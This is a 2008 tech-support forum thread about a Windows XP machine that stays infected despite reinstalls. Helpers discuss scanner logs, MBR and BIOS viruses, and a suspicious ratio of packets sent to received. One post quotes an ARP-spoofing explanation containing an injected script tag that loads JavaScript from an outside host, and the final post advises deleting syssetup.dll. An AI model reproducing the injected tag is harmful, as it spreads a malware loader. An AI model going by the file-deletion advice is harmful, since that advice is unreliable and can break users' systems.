TechSpot

Horribly infected XP machine

By elymcd
Nov 15, 2008
  1. Somehow caught a virus last week with no luck getting it to go away, scanners , antiviruses , safe mode repair install , recovery and zero filled hd, and still there ! bout to give it a flying lesson . currently scanning w mbam and superanti , I am on a diff computer because the virus keeps disabling my network adapter and other svces. windows XP sp2 install untatted . helpme please !!! be back in a min with HJ log
     
  2. mflynn

    mflynn TS Rookie Posts: 2,655

    OK !

    When you can UPDATE MBAM and SAS! Then unplug the Network cable.

    1. Once MBAM completes and says it found and fixed anything then reboot and run again untill it comes up clean.

    2. Same with SAS run repeatedly until clean.

    3.Reboot reattach the cable and send the logs from both programs.

    4. Open but don't run MBAM click logs and post all beginning with the top one.

    5. In SAS click Preferences -Statistics/Logs from top to bottom.

    Mike
     
  3. elymcd

    elymcd TS Rookie Topic Starter Posts: 20

    Logs for My Huge problem

    I updated super, and mbam offline both current . Last night I gave up on scanners and used segate tools and zero filled then reinstalled xp , I have not connected to the net ..whan i do im sending out 6-7 million packets and recieving less than 100 . i have also reset my cmos and fixboot Thank you in advance!
     

    Attached Files:

  4. elymcd

    elymcd TS Rookie Topic Starter Posts: 20

    cannot update online

    sorry i had already posted the logs but i did try and neither mbam or super or any scanners for that matter will connect , The last spybot i did said my HKLM/software/windows/ security had been disabled i fixed it then checked with regedit just now and they are all disabled again. makes me crazy anyhow ...think im gna call it a night thank you again hopefully in the morning sombody will have an idea of whats goin on
     
  5. gbhall

    gbhall TechSpot Chancellor Posts: 2,425   +77

    It seems you have already done all this, but the normal route would be....

    The virus is in certain Windows start-up files, and disinfection is not permanent because it reappears at next boot. It takes an expert to remove this problem without having to reinstall Windows, and the chances are probably not good.

    I would recommend a hard disk wipe and reinstall. You want to get data off first? Write a bootable CD - say Ubuntu linux would be fine. With that booted, you can transfer all your important stuff to backup.

    You might like to replace the bios first of all, just in case of a bios virus (never heard of one, but best to be safe), followed by reinstall of Windows, including SP3, install anti-virus (Avast recommended), firewall (zonealam recommended), then finally update all recent patches form MS update and your data. The virus could of course be in your data too, so a complete, deep scan would be a good idea - preferably before replacing on your hard drive.

    Since you are having trouble keeping a clean system, some people would say the infection is actually in one of your defensive programs, maybe Norton AV, so I would not install that at all, IMHO Avast is much better. Same goes for Windows messanger etc. You will find that Avast has 7 specialised defenses for things like email, network, browsing, P2P, messaging, etc etc which is why it seems better to me. Free too !
     
  6. elymcd

    elymcd TS Rookie Topic Starter Posts: 20

    Gna try again

    I have backed up my info already to some dvds re- partitioned and low level format, wouldnt that get rid of any startup files? I've thought about the bios as well but small prob i dnt have a floppy drive to flash the bios , thats the only way i know how , I have a biostar 1945g-m7 1066 fsb intel d 3 ghz 3g ram. right now my computer is close to being done w a fresh install , im gna just install hijack spybot and the formentioned antivirus . ill post logs shortly
     
  7. elymcd

    elymcd TS Rookie Topic Starter Posts: 20

    OK om at a loss reinstalled did windows update except sp3 28 updates in total spybot current mbam current avast home current : after reboot avast boot scan: no infections , spybot sd 5 reg changes , security center disabled avast has found nothing network, LAN packets recived 3,889 -sent 95,000 so i duno , Please help im at a loss of what to do ! I will post logs in a min
     
  8. elymcd

    elymcd TS Rookie Topic Starter Posts: 20

    No Infections , All Lies!!!

    Did upgrade 2 sp3 same probs , somthings destroying system files , my screen just changed to 16 bit and windows aperance is weird like in safe mode
     
  9. gbhall

    gbhall TechSpot Chancellor Posts: 2,425   +77

    This seems bad. A bios virus is a possibility. You can replace the bios by building a bootable CD (many sources) and adding the bios rebuilding file and executable to it. As long as some variety of Dos is running, that is enough, but the CD bit is essential to avoid running an infected OS (yes, even Dos).

    I suspect something you install or run immediately after re-installing Windows is infected. Be aware that once the infection is in memory, it is capable of hiding itself from all normal scans. The crucial thing is to be able to boot into an uninfected state, then run scans.

    There is not much danger in using an old PC as a sacrificial lamb. You install all the latest scanners on an old PC, attach your current hard drive in place of a CD, and run deap scans to see what is found and where, without any of it actually being executed.

    Your network symptoms do suggest a trojan. I have no idea if a router can be infected, but I suppose it can be.

    A more likely scenario is you are running a network in which another PC is infected. See here

    "English version:
    If you got the problem that in every loaded page appears a javascript tag like <script language="javascript" SRC="http://mx.content-type.cn:443/day.js"></script> this is the solution for your problem.

    The cause is a trojan horse (virus) on another computer in your network!

    This other computer is telling your PC that it is the gateway to the internet by modifying its hardware address (MAC). Your computer is in consequence sending all traffic to the infected PC which forwards it to the internet and filters it in order to put its malicious code.

    You can find out which computer is the evil one by typing following into your command line:
    arp -a
    In the appearing table search for a double assigned physical address which is once assigned to the gateway IP address and once assigned to another IP.
    Find out which computer is the other IP and you will have the virus host.
    Scan that one for virus and malware (we are just about to conduct that scan)."
     
  10. Bobbye

    Bobbye Helper on the Fringe Posts: 16,335   +36

    I checked the HijackThis log- it may not still be valid, but here are some considerations:

    First, you need to disable TeaTimer for now:
    Second, there are policy restriction prevent you from accessing:
    These have to be set by the Administrator. If they were not, have HijackThis remove them.
    Once done, see if you can run the three cleaning programs per:
    http://www.techspot.com/vb/topic58138.html

    When through, attach all three logs here for review.

    O23 - Service: W - Unknown owner - C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\W.exe (file missing)
     
  11. elymcd

    elymcd TS Rookie Topic Starter Posts: 20

    Still somhow infected

    did bios flash windows reinstall and without hooking to network ... still infected .. could sombody direct me in the direction to inspect startup files cause obliously its in that area , im computer sauvy enough to del with start up files , alredy ussed recovery and did fixmbr and boot cmds with no luck ... is it possible for a dos infection... if so how do i scan and fix thank you im desperate to find the prob ! thank you for all your responses and patience
     
  12. mflynn

    mflynn TS Rookie Posts: 2,655

    You did a clean install with format?

    You did a new install without format?

    You did an overlay/repair install? If so all original files folders programs email etc should be there.

    If you did new install with out format browse to the root of boot drive "usually C:" and see if you now have 2 windows folders

    1 Windows folder or
    1 a Windows folder and a Windows.000 or Winnt folder?

    Mike
     
  13. Bobbye

    Bobbye Helper on the Fringe Posts: 16,335   +36

    Post 1:
    Post 2:
    Post 3: Logs
    Post 6:
    Post 7:
    Post 8:
    Post 10:
    Post 11:
    Every time you did these 're-installs, everything that had been done up to that point was undone. And putting updates-especially major updates like SP3 on an unstable system is asking for more trouble.

    I strongly suggest you stop the haphazard reinstalling, updating etc. and go back to Step 1 and begin anew. Post the log, they will be reviewed and if additional programs are indicated, they will be suggested. http://www.techspot.com/vb/topic58138.html

    This is going nowhere.
     
  14. mflynn

    mflynn TS Rookie Posts: 2,655

    You said that right Bobbye!:)

    Mike
     
  15. gbhall

    gbhall TechSpot Chancellor Posts: 2,425   +77

    Possible case of MBR virus. Your best chance of removing this is buy a new hard disk and reinstall, but ONLY from a CD guaranteed to be original. Same goes for everything you use to update Windows. The service packs (downloaded), the anti-virus, firewall (downloaded) they can all be infected.

    See here Don't be a victim of Sinowal, the super-Trojan in http://windowssecrets.com/comp/081120/ which gives a rather frightening picture, but explains why you can scan your PC after fresh install without seeing anything, because the virus does not activate for many minutes. It is not necessarily that one you have, but very probably some form of MBR virus.
     
  16. elymcd

    elymcd TS Rookie Topic Starter Posts: 20

    going back to square.. attempting to ... did full zero fill now xp wont install , saying cannot copy files cmnicfg.xml and many other, when i get installed i will scan and post fresh logs and see where i get from there. ...dont know if it matters but i cannot use my seagate discwizard to zero fill from that machine the program files will not load and puts me back to ctrl alt del to restart , however works flawlessly on my sacrificial pc . maybe related symptom maybe not ?
     
  17. elymcd

    elymcd TS Rookie Topic Starter Posts: 20

    Back At One, Somthin Not Right

    Alright guys unfortunatly im back . Finally got reinstalled, not doin it again , obviosly not helping.lol . Anyhow the only thing ive done is install antivirus , superantispy, ect. here are the three logs u requested . Please help !! Also I am still sending an ungodly amount of packets while at idle and the is a small padlock icon in my network details that ive only seen when there is limited or no connectivity however im connected fine as far as i can tell
     
  18. Bobbye

    Bobbye Helper on the Fringe Posts: 16,335   +36

    Okay, I'm going to start all over!

    Mbam log is clean.
    SAS log is clean.
    Hijack entries are okay but you ran an outdated version. Is this what you've been using all the time? Please run one more HijackThis using v2.0.2 here:
    http://www.download.com/Trend-Micro-HijackThis/3000-8022_4-10227353.html


    Can you be more specific about the current problem? What are the 'packets' you're referring to? If you have any programs on auto-update, they are going to be accessing the internet frequently looking for updates. So that would accounts for some activity.

    So why is this bothering you? If the HijackThis log comes out clean, we'll remove the cleaning tools and in the absence of any new problem will conclude this cleaning.

    Do Not repair/reformat or reinstall- again.
    Do not use System Restore- we need to clean the old points.
     
  19. elymcd

    elymcd TS Rookie Topic Starter Posts: 20

    Thats good news ..I hope

    The Problem i have with the packets is just the ratio of sent versus recieved ..I havent paid that much attention to it in the past but im sure i would have noticed that huge of a difference, I noticed it after i got infected in the first place. currently the packet count AT IDLE is ...SENT:438,318 and RECIEVED:69 not sure if thats ok , it just dont seem right . maybe you could shed some light on this. I very much appreciate your help . i will post an updated HJ
     
  20. elymcd

    elymcd TS Rookie Topic Starter Posts: 20

    OOPs

    Sorry bout that heres the hj
     
  21. gbhall

    gbhall TechSpot Chancellor Posts: 2,425   +77

    I suppose I ought to ask the obvious question - where are you getting the figure for packets sent from ? Maybe that is since your broadband connection started ? Two years ago.....???

    Try looking at the network connections icon in control panel - double click on the local network connection, and what do you see ? After half an hour web-browsing i get sent 911,266 bytes, received 2,272,373 for instance on the network bridge. On the other hand, local area connection says sent packets 3,872, received packets 3,375
     
  22. bushwhacker

    bushwhacker TechSpot Chancellor Posts: 783

    Hijackthis site says....

    looks suspicious. It says it's nasty.
     
  23. elymcd

    elymcd TS Rookie Topic Starter Posts: 20

    Packets

    Im getting the packets info from the local area connection status via ctrl panel network conn local area.. on the machine im on now the sent and recived are close to the same , about like yours.
     
  24. elymcd

    elymcd TS Rookie Topic Starter Posts: 20

    What About a rootkit ? could that be the case if so what do you recomennd
     
  25. bushwhacker

    bushwhacker TechSpot Chancellor Posts: 783

    use the panda anti-rootkit, which it can be found in here.

    Other than all, my recommendation is to boot in safe mode and delete the syssetup.dll and syssetub.dll and fix the info i provided to you.
     
Topic Status:
Not open for further replies.

Similar Topics

Add New Comment

You need to be a member to leave a comment. Join thousands of tech enthusiasts and participate.
TechSpot Account You may also...